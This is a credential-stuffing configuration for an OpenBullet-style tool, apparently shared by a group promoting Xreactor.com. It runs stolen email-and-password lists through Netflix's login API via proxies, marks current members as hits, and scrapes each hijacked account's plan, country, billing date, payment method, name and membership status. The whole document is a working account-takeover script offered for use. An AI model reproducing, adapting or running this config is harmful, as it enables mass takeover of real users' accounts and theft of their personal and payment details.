[SETTINGS]
{
  "Name": "FUCKED NET FLIX  | Xreactor.com | @Dr01",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-04-01T15:44:55.1447742+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Telegram Channel : @Xreactor_Team | Xreactor.com | @Dr01",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "CONFIGE BY Xreactor.com | @Dr01",
      "VariableName": "",
      "Id": 659294428
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "FUCKED NET FLIX  DR01",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET_TOKENS_ REQUEST GET "https://www.netflix.com/au/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#flwssn PARSE "<COOKIES(flwssn)>" LR "" "" -> VAR "flwssn" 

#authURL PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL" 

FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

#SEND_DATA_ REQUEST POST "https://api-global.netflix.com/account/auth" 
  CONTENT "email=<USER>&password=<PASS>&setCookies=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/Login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "NetflixId\":null,\"user\":{\"" 
    KEY "Incorrect email address or password" 
    KEY "Missing password" 
    KEY "NEVER_MEMBER" 
  KEYCHAIN Ban OR 
    KEY "Invalid Request" 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "FORMER_MEMBER" 

#CHECK_CAPTUER REQUEST GET "https://www.netflix.com/YourAccount" 
  
  COOKIE "flwssn: <flwssn>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/browse" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 

#Plan PARSE "<SOURCE>" LR "data-uia=\"plan-label\"><b>" "</b>" -> CAP "Plan" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

#Billing PARSE "<SOURCE>" LR "data-uia=\"nextBillingDate-item\">" "<" -> CAP "Billing" 

#Payment_Method PARSE "<SOURCE>" LR "paymentMethod\":{\"fieldType\":\"String\",\"value\":\"" "\"}" -> CAP "Payment Method" 

#first_Name PARSE "<SOURCE>" LR "firstName\":\"" "\"" CreateEmpty=FALSE -> CAP "first Name" 

#last_Name PARSE "<SOURCE>" LR "lastName\":\"" "\"," CreateEmpty=FALSE -> CAP "last Name" 

#membership_Status PARSE "<SOURCE>" LR "membershipStatus\":\"" "\"," CreateEmpty=FALSE -> CAP "membership Status" 

#has_DvD PARSE "<SOURCE>" LR ",\"hasDvd\":" ",\"" CreateEmpty=FALSE -> CAP "has DvD" 

FUNCTION Constant "Xreactor.com | @Dr01" -> CAP "configeBY" 

